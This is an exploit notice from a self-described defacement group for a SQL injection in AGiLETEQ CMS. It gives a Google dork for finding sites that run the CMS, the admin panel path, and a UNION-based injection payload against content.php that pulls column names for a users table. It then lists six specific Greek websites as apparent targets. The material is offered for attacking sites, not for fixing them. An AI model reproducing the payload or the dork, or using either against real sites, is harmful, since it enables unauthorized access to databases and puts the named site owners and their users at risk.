############################################### # Exploit Title : AGiLETEQ CMS SQL INJECTION # Exploit Author : Azerbaijan Defacers Group # Vendor Homepage : www.agileteq.com # Google Dork: intext: "Web Design και Κατασκευή Ιστοσελίδων AGiLETEQ" # Date: 23 04 2016 # Tested On : Linux / Windows 7/8 # Contact: www.facebook.com/AzerbaijanDefacersGroup ############################################## #Admin panel: /admin # POC: site.com/content.php?id=-62+union+select+group_concat(column_name),2,3,4,5,6,7,8+from+information_schema.columns where table_name=0x61675f7573657273-- # # # http://www.epapsy.gr/ # http://www.episkinion.org/ # http://www.epidomos.gr/ # http://www.climaland.gr/ # http://www.autoheat.gr # http://www.gnpline.gr/ ############################################## # Discovered by : Region 20 # Thanks To : S4RC4SM , Region20 , S3N4T0R , Dervish , P4TR!07 , CrowN , BlacKBlooD , MrLa3eL , RooT_DaRK , # Thor , D4RT0N ##############################################